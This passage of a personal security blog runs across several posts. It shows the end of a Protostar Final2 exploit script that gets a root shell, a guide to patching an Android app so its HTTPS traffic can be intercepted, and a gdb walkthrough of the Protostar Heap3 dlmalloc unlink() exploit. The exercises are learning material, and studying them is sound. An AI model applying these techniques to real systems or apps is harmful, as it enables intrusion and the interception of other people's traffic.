t = telnetlib.Telnet()
t.sock = s
t.interact()

python final2.py 192.168.99.107

Process OK
whoami
root

References

https://medium.com/@iphelix/exploit-exercises-protostar-final-levels-72875b0c3387

How to Analyze Mobile App Traffic and Reverse Engineer Its Non-Public API

2020-10-16T17:08:35-04:00

Have you ever wanted to analyze the traffic between a mobile app and its servers or reverse engineer a mobile app’s non-public API? Here’s one way.

The basic principle is to proxy the traffic from the app through a computer you control on which you can capture and analyze traffic. If the app you’re interested in is using an unencrypted protocol like HTTP, this is pretty easy. Just run a proxy on your computer and configure your mobile device to proxy network traffic through your computer’s IP.

Most apps these days, however, use encrypted protocols like HTTPS (or are even required to by default by mobile OSes). Data at the TCP layer and below like IP addresses and port numbers are visible in plaintext, but all application level data at the HTTPS layer is encrypted. So you run a proxy that supports HTTPS on your computer, but then your app doesn’t trust the self-signed TLS certificate your computer presents. Mobile apps used to trust certificates that the mobile device’s system trusted. So you could just download the self-signed certificate onto the mobile device and configure the mobile OS to trust it. But these days mobile app frameworks let developers customize their app’s network security settings (like so for Android).

Let’s say your mobile app has custom trust anchors or pins certificates. What do you do now? You can either

disable the certificate check completely
or alter the certificate check

I’m not familiar with how to do this on iOS (there seem to be good resources out there like this) so will show how to do option two on Android.

Setup mobile device and app

I don’t have an Android so used an emulator called Genymotion. I created a Samsung Galaxy S9 virtual device which is has a recent enough Android OS to run most mobile apps. In order to install the mobile app from the Google Play Store I had to install OpenGApps. I think I’m also able to download the APK from the web and drag and drop it into the emulator to install.

Install Charles Proxy TLS certificate on device

To install the Charles cert, I had to open this page in Chrome. The built-in browser in the emulator didn’t seem to prompt me to download the Charles cert, but Chrome did. I installed Chrome by install OpenGApps and then installing Chrome from the Play store. I think I also needed to configure the Android device to use Charles as its proxy with these steps in order to get the certificate download prompt. Then I made the Android device trust it.

Patch the Android app’s network security config

I used `apktool to decompile the APK.

brew install apktool

apktool d /path/to/app.apk
cd app
find . -name network_security_config.xml
./res/xml/network_security_config.xml

cat res/xml/network_security_config.xml

        res.cloudinary.com
        app-res.cloudinary.com

The app only allows cleartext to the above two domains. I don’t see any pinned certificates, but there must be some defaults since the app didn’t trust the same certs trusted by the Android OS. So I updated network_security_config.xml to be the following.

    
        res.cloudinary.com
        app-res.cloudinary.com

Then I tried recompiling the patched APK but got the following error.

cd app
apktool b . -o ~/Downloads/app-patched.apk

I: Using Apktool 2.4.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes10 folder into classes10.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes9 folder into classes9.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes8 folder into classes8.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
W: invalid resource directory name: /Users/dxia/Downloads/app/./res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/var/folders/y_/sjt8100n43g69mtr9t588d6r0000gp/T/brut_util_Jar_15064276297777137207.tmp, p, --forced-package-id, 127, --min-sdk-version, 21, --target-sdk-version, 29, --version-code, 160072564, --version-name, 7.21.0, --no-version-vectors, -F, /var/folders/y_/sjt8100n43g69mtr9t588d6r0000gp/T/APKTOOL339327577576851750.tmp, -e, /var/folders/y_/sjt8100n43g69mtr9t588d6r0000gp/T/APKTOOL5191817693537904820.tmp, -0, arsc, -I, /Users/dxia/Library/apktool/framework/1.apk, -S, /Users/dxia/Downloads/app/./res, -M, /Users/dxia/Downloads/app/./AndroidManifest.xml]

This Github issue comment suggested I run that command with the --use-aapt2 switch. Then I got another error.

apktool b --use-aapt2 . -o ~/Downloads/app-patched.apk

I: Using Apktool 2.4.1
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
W: /Users/dxia/Downloads/app-patched/./res/values/public.xml:2119: error: resource 'drawable/$avd_hide_password__0' has invalid entry name '$avd_hide_password__0'. Invalid character '$avd_hide_password__0'.
W: /Users/dxia/Downloads/app-patched/./res/values/public.xml:2120: error: resource 'drawable/$avd_hide_password__1' has invalid entry name '$avd_hide_password__1'. Invalid character '$avd_hide_password__1'.
W: /Users/dxia/Downloads/app-patched/./res/values/public.xml:2121: error: resource 'drawable/$avd_hide_password__2' has invalid entry name '$avd_hide_password__2'. Invalid character '$avd_hide_password__2'.
W: /Users/dxia/Downloads/app-patched/./res/values/public.xml:2122: error: resource 'drawable/$avd_show_password__0' has invalid entry name '$avd_show_password__0'. Invalid character '$avd_show_password__0'.
W: /Users/dxia/Downloads/app-patched/./res/values/public.xml:2123: error: resource 'drawable/$avd_show_password__1' has invalid entry name '$avd_show_password__1'. Invalid character '$avd_show_password__1'.
W: /Users/dxia/Downloads/app-patched/./res/values/public.xml:2124: error: resource 'drawable/$avd_show_password__2' has invalid entry name '$avd_show_password__2'. Invalid character '$avd_show_password__2'.
W: error: resource android:style/Animation.InputMethodFancy is private.
W: error: resource android:style/Animation.VoiceInteractionSession is private.
W: error: resource android:style/AlertDialog is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v24/styles.xml:10: error: style attribute 'android:attr/preferenceListStyle' is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v24/styles.xml:40: error: style attribute 'android:attr/preferenceListStyle' is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v24/styles.xml:70: error: style attribute 'android:attr/preferenceListStyle' is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v24/styles.xml:99: error: style attribute 'android:attr/preferenceListStyle' is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v28/styles.xml:8: error: style attribute 'android:attr/allowMassStorage' is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v26/styles.xml:13: error: resource android:attr/internalMaxWidth is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v26/styles.xml:16: error: resource android:attr/internalMaxWidth is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v26/styles.xml:20: error: style attribute 'android:attr/internalMinHeight' is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v28/styles.xml:17: error: resource android:attr/allowMassStorage is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v28/styles.xml:20: error: resource android:attr/allowMassStorage is private.
W: error: resource android:style/DialogWindowTitle is private.
W: /Users/dxia/Downloads/app-patched/./res/values-v23/styles.xml:13: error: style attribute 'android:attr/attr/private_resource_pad36' not found.
W: /Users/dxia/Downloads/app-patched/./res/values-v23/styles.xml:14: error: style attribute 'android:attr/attr/private_resource_pad35' not found.
W: /Users/dxia/Downloads/app-patched/./res/values-v23/styles.xml:20: error: style attribute 'android:attr/attr/private_resource_pad36' not found.
W: /Users/dxia/Downloads/app-patched/./res/values-v23/styles.xml:21: error: style attribute 'android:attr/attr/private_resource_pad35' not found.
W: /Users/dxia/Downloads/app-patched/./res/values-v23/styles.xml:24: error: resource android:attr/private_resource_pad31 not found.
W: /Users/dxia/Downloads/app-patched/./res/values-v26/styles.xml:10: error: style attribute 'android:attr/internalMinHeight' is private.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/var/folders/y_/sjt8100n43g69mtr9t588d6r0000gp/T/brut_util_Jar_11817644492691338390.tmp, link, -o, /var/folders/y_/sjt8100n43g69mtr9t588d6r0000gp/T/APKTOOL6551307854758959712.tmp, --package-id, 127, --min-sdk-version, 21, --target-sdk-version, 29, --version-code, 160072564, --version-name, 7.21.0, --no-auto-version, --no-version-vectors, --no-version-transitions, --no-resource-deduping, -e, /var/folders/y_/sjt8100n43g69mtr9t588d6r0000gp/T/APKTOOL6723837428467013762.tmp, -0, arsc, -I, /Users/dxia/Library/apktool/framework/1.apk, --manifest, /Users/dxia/Downloads/app-patched/./AndroidManifest.xml, /Users/dxia/Downloads/app-patched/./build/resources.zip]

This PR fixes the above on Linux and Windows. As of this writing, it’s not released yet. So I had to build from source on an Ubuntu VM.

java -jar ~/Apktool/brut.apktool/apktool-cli/build/libs/apktool-cli-all.jar b --use-aapt2 . -o ~/Downloads/app-patched.apk

I: Using Apktool 2.4.2-3ac7e8-SNAPSHOT
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...

I signed the patched APK. First I generated some keys. I’m not sure if certain signing and key algorithms are required, but these are the ones I used.

keytool -genkey -alias keys -keystore keys -sigalg MD5withRSA -keyalg RSA -keysize 2048 -validity 10000

Enter keystore password:
Re-enter new password:
What is your first and last name?
  [Unknown]:
What is the name of your organizational unit?
  [Unknown]:
What is the name of your organization?
  [Unknown]:

What is the name of your City or Locality?
  [Unknown]:  What is the name of your State or Province?
  [Unknown]:
What is the two-letter country code for this unit?
  [Unknown]:
Is CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown correct?
  [no]:  yes


Warning:
The generated certificate uses the MD5withRSA signature algorithm which is considered a security risk.

jarsigner -sigalg MD5withRSA -digestalg SHA1 -verbose -keystore keys app-patched.apk keys

Then when dragging and dropping the patched APK into the virtual device, I got an error saying the app couldn’t be installed. In these cases, generating the logs and grepping through them for errors like INSTALL_PARSE_FAILED_NO_CERTIFICATES and INSTALL_FAILED_VERIFICATION_FAILURE helps. I fixed this last error by disabling USB verification in the virtual device settings. The setting for this is inside the virtual Android device itself under “developer settings.”

Sniff the traffic

I made sure the traffic was proxied through my computer, the patched app started successfully, and I was able to see unencrypted data in Charles!

References

“How to patch Android app to sniff its HTTPS traffic with self-signed certificate”

How to Exploit Dlmalloc Unlink(): Protostar Level Heap3

2020-04-19T18:51:48-04:00

While stuck inside during social distancing, I’ve been making my way through LiveOverflow’s awesome Youtube playlist “Binary Exploitation / Memory Corruption.” His videos are structured around a well known series of exploit exercises here called “Protostar.” I took the time to truly understand each one before moving onto the next as the exercises build on each other. For the past several days I’ve been trying to understand the “Heap3” level, a relatively complex level that requires manipulating the heap to redirect code execution to an arbitrary function. After rewatching the video many times and reading numerous other online explanations, I finally understand! That moment of understanding feels so gratifying.

Many other resources already explain the exploit well, but I’m writing my own explanation to reinforce my understanding and to celebrate.

Exploit Exercise Protostar Heap3

#include 
#include 
#include 
#include 
#include 

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}

The source code is pretty straightforward. There’s the main() and winner() functions. There’s three character pointers, three malloc()’s, three strcpy()’s, three free()’s, and finally a printf(). Our goal is to redirect code execution from main() to winner().

The description at the top of the level is

This level introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.

All these exercises are on 32-bit x86 architecture.

Background on dlmalloc

The vulnerable malloc is usually referred to as dlmalloc (named after one of its authors Doug Lea) and must be an old version like this one from 1996. The Phrack article “Once Upon a free()…” provides useful background.

Most malloc implementations share the behaviour of storing their own management information, such as lists of used or free blocks, sizes of memory blocks and other useful data within the heap space itself.

The central attack of exploiting malloc allocated buffer overflows is to modify this management information in a way that will allow arbitrary memory overwrites afterwards.

For our purposes, skip to the “GNU C Library implementation” section. It says that memory slices or “chunks” created by malloc are organized like so. On 32-bit systems, prev_size and size are 4 bytes each. data is the user data section. malloc() returns a pointer to the address where data starts.

.            +----------------------------------+
    chunk -> | prev_size                        |
             +----------------------------------+
             | size                             |
             +----------------------------------+
      mem -> | data                             |
             : ...                              :
             +----------------------------------+
nextchunk -> | prev_size ...                    |
             :                                  :

The other important things to know about the vulnerable version(s) of dlmalloc are:

The lowest bit of size called PREV_INUSE indicates whether the previous chunk is used or not
Once we free() the chunk using free(mem), the memory is released, and if its neighboring chunks aren’t free, dlmalloc will clear the next chunk’s PREV_INUSE and add the chunk to a doubly-linked list of other free chunks. It does this by adding a forward and backward pointer at mem.

.            +----------------------------------+
    chunk -> | prev_size                        |
             +----------------------------------+
             | size                             |
             +----------------------------------+
      mem -> | fd                               |
             +----------------------------------+
             | bk                               |
             +----------------------------------+
             | (old memory, can be zero bytes)  |
             :                                  :

nextchunk -> | prev_size ...                    |
             :                                  :

If neighboring chunks are free, dlmalloc will merge the just freed chunk with its neighboring chunks. The two neighboring free chunks are in a doubly-linked list. dlmalloc first removes the neighboring chunk at the lower memory address from the list, merges it with the recently freed chunk, and repeats this for the neighboring chunk at the higher memory address. The unlinking is done with a macro called unlink() which removes an entry from a doubly-linked list and ties the loose ends of the list back together.

#define unlink(P, BK, FD)                                                     \
{                                                                             \
  BK = P->bk;                                                                 \
  FD = P->fd;                                                                 \
  FD->bk = BK;                                                                \
  BK->fd = FD;                                                                \
}                                                                             \

Written with pointer notation:

BK = *(P + 12);  # content of memory address P + 12 stored in BK
FD = *(P + 8);   # content of memory address P + 8 stored in FD
*(FD + 12) = BK; # set the content of memory address FD + 12 to BK
*(BK + 8) = FD;  # set the content of memory address BK + 8 to FD

Since we can overwrite the bytes of P, we can overwrite 4-bytes of memory at two arbitrary places. To trigger this code path, chunks being consolidated must be bigger than 80 bytes. dlmalloc classifies these chunks as “fastbins.”

An array of lists holding recently freed small chunks. Fastbins are not doubly linked.

What the heap looks like in heap3.c

Run gdb on heap3.c. My personal preference is to set the disassembly-flavor to intel and turn off pagination.

user@protostar:~$ cd /opt/protostar/bin

user@protostar:/opt/protostar/bin$ gdb heap3
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/heap3...done.

(gdb) set disassembly-flavor intel
(gdb) set pagination off

We first disassemble the main() function.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048889 <main+0>:    push   ebp
0x0804888a <main+1>:    mov    ebp,esp
0x0804888c <main+3>:    and    esp,0xfffffff0
0x0804888f <main+6>:    sub    esp,0x20
0x08048892 <main+9>:    mov    DWORD PTR [esp],0x20
0x08048899 <main+16>:   call   0x8048ff2 <malloc>
0x0804889e <main+21>:   mov    DWORD PTR [esp+0x14],eax
0x080488a2 <main+25>:   mov    DWORD PTR [esp],0x20
0x080488a9 <main+32>:   call   0x8048ff2 <malloc>
0x080488ae <main+37>:   mov    DWORD PTR [esp+0x18],eax
0x080488b2 <main+41>:   mov    DWORD PTR [esp],0x20
0x080488b9 <main+48>:   call   0x8048ff2 <malloc>
0x080488be <main+53>:   mov    DWORD PTR [esp+0x1c],eax
0x080488c2 <main+57>:   mov    eax,DWORD PTR [ebp+0xc]
0x080488c5 <main+60>:   add    eax,0x4
0x080488c8 <main+63>:   mov    eax,DWORD PTR [eax]
0x080488ca <main+65>:   mov    DWORD PTR [esp+0x4],eax
0x080488ce <main+69>:   mov    eax,DWORD PTR [esp+0x14]
0x080488d2 <main+73>:   mov    DWORD PTR [esp],eax
0x080488d5 <main+76>:   call   0x8048750 <strcpy@plt>
0x080488da <main+81>:   mov    eax,DWORD PTR [ebp+0xc]
0x080488dd <main+84>:   add    eax,0x8
0x080488e0 <main+87>:   mov    eax,DWORD PTR [eax]
0x080488e2 <main+89>:   mov    DWORD PTR [esp+0x4],eax
0x080488e6 <main+93>:   mov    eax,DWORD PTR [esp+0x18]
0x080488ea <main+97>:   mov    DWORD PTR [esp],eax
0x080488ed <main+100>:  call   0x8048750 <strcpy@plt>
0x080488f2 <main+105>:  mov    eax,DWORD PTR [ebp+0xc]
0x080488f5 <main+108>:  add    eax,0xc
0x080488f8 <main+111>:  mov    eax,DWORD PTR [eax]
0x080488fa <main+113>:  mov    DWORD PTR [esp+0x4],eax
0x080488fe <main+117>:  mov    eax,DWORD PTR [esp+0x1c]
0x08048902 <main+121>:  mov    DWORD PTR [esp],eax
0x08048905 <main+124>:  call   0x8048750 <strcpy@plt>
0x0804890a <main+129>:  mov    eax,DWORD PTR [esp+0x1c]
0x0804890e <main+133>:  mov    DWORD PTR [esp],eax
0x08048911 <main+136>:  call   0x8049824 <free>
0x08048916 <main+141>:  mov    eax,DWORD PTR [esp+0x18]
0x0804891a <main+145>:  mov    DWORD PTR [esp],eax
0x0804891d <main+148>:  call   0x8049824 <free>
0x08048922 <main+153>:  mov    eax,DWORD PTR [esp+0x14]
0x08048926 <main+157>:  mov    DWORD PTR [esp],eax
0x08048929 <main+160>:  call   0x8049824 <free>
0x0804892e <main+165>:  mov    DWORD PTR [esp],0x804ac27
0x08048935 <main+172>:  call   0x8048790 <puts@plt>
0x0804893a <main+177>:  leave
0x0804893b <main+178>:  ret
End of assembler dump.

The printf has become a puts(). plt stands for procedure linkage table, one of the structures which makes dynamic loading and linking easier to use. @plt means we are calling puts at PLT entry at address 0x8048790. If we disassemble that address we see

(gdb) disassemble 0x8048790
Dump of assembler code for function puts@plt:
0x08048790 <puts@plt+0>:    jmp    DWORD PTR ds:0x804b128
0x08048796 <puts@plt+6>:    push   0x68
0x0804879b <puts@plt+11>:   jmp    0x80486b0
End of assembler dump.

It calls another function at address 0x804b128. This address is part of the Global Offset Table (GOT) which points to the dynamically linked library containing the actual puts() function.

(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x08048796

We want to replace the call to puts() with a call to winner(). So we want to overwrite the contents of 0x804b128 in the GOT, currently 0x08048796, with the address to winner().

To get a visual sense of what the heap looks like, set breakpoints at every library function call, i.e. break at the address of malloc(), strcpy(), free(), and puts().

(gdb) break *0x8048ff2
Breakpoint 1 at 0x8048ff2: file common/malloc.c, line 3211.
(gdb) break *0x8048750
Breakpoint 2 at 0x8048750
(gdb) break *0x8049824
Breakpoint 3 at 0x8049824: file common/malloc.c, line 3583.
(gdb) break *0x8048790
Breakpoint 4 at 0x8048790

Run the program with some recognizable input strings.

(gdb) r AAAAAAAAAAAA BBBBBBBBBBBB CCCCCCCCCCCC
Starting program: /opt/protostar/bin/heap3 AAAAAAAAAAAA BBBBBBBBBBBB CCCCCCCCCCCC

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  common/malloc.c: No such file or directory.
  in common/malloc.c

We’ve hit the first breakpoint. Continue past it so that one malloc() is called and the heap is initialized.

(gdb) c
Continuing.

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  in common/malloc.c

Now look at the mapped memory regions.

(gdb) info proc mapping
process 1542
cmdline = '/opt/protostar/bin/heap3'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap3'
Mapped address spaces:

  Start Addr   End Addr       Size     Offset objfile
   0x8048000  0x804b000     0x3000          0        /opt/protostar/bin/heap3
   0x804b000  0x804c000     0x1000     0x3000        /opt/protostar/bin/heap3
   0x804c000  0x804d000     0x1000          0           [heap]
  0xb7e96000 0xb7e97000     0x1000          0
  0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
  0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
  0xb7fd9000 0xb7fdc000     0x3000          0
  0xb7fe0000 0xb7fe2000     0x2000          0
  0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
  0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
  0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
  0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
  0xbffeb000 0xc0000000    0x15000          0           [stack]

The heap starts at 0x804c000, ends at 0x804d000, and has size 0x1000 or 4096 bytes. We can define hooks in gdb. We define one to examine the first 56 words of the heap in hexadecimal every time execution stops.

(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/56wx 0x804c000
>end

If we continue, we hit the third malloc. At this point two malloc()’s have been called.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c010: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000fb1  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  in common/malloc.c

The second word of the chunk up to the last three bits indicates the chunk size in bytes. 0x29 is 0b101001. Without the last three bits it’s 0b101000 which is 40. We can see the chunk starts at 0x804c000 and ends at 0x804c028 which is the start of the next chunk. This range encompasses 10 words. Each word is 4 bytes which makes 10 * 4 = 40 bytes. The last bit of the size word indicates that the previous chunk is in use. By convention the first chunk has this bit turned on because there’s no previous chunk that’s free.

The second chunk resulting from the second malloc() starts at 0x804c028 and ends at 0x804c050. It’s identical to the first chunk. Continue past the third malloc().

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c010: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 2, 0x08048750 in strcpy@plt ()

We see a third chunk is created. The number at the end (right now 0x00000f89) indicates the remaining size of the heap. It has been decreasing. Continue past the first strcpy().

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 2, 0x08048750 in strcpy@plt ()

We see the the 12 A’s (ASCII value 41) have been written to the heap. Continue two more times past the remaining two strcpy()’s.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 2, 0x08048750 in strcpy@plt ()
(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x43434343  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c058) at common/malloc.c:3583
3583  in common/malloc.c

We see the 12 B’s and C’s being written to their respective chunks. We are now at the first free(). Continue again.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c030) at common/malloc.c:3583
3583  in common/malloc.c

The first word of the third chunk’s data at 0x804c058 has been zeroed out. Continue.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x0804c050  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c008) at common/malloc.c:3583
3583  in common/malloc.c

0x804c030 now has 0x0804c050 which is a pointer to the start of the third chunk. This shows the second and third chunk are now tied together in a singly-linked list since they are small enough to be considered fastbins. Continue.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x0804c050  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
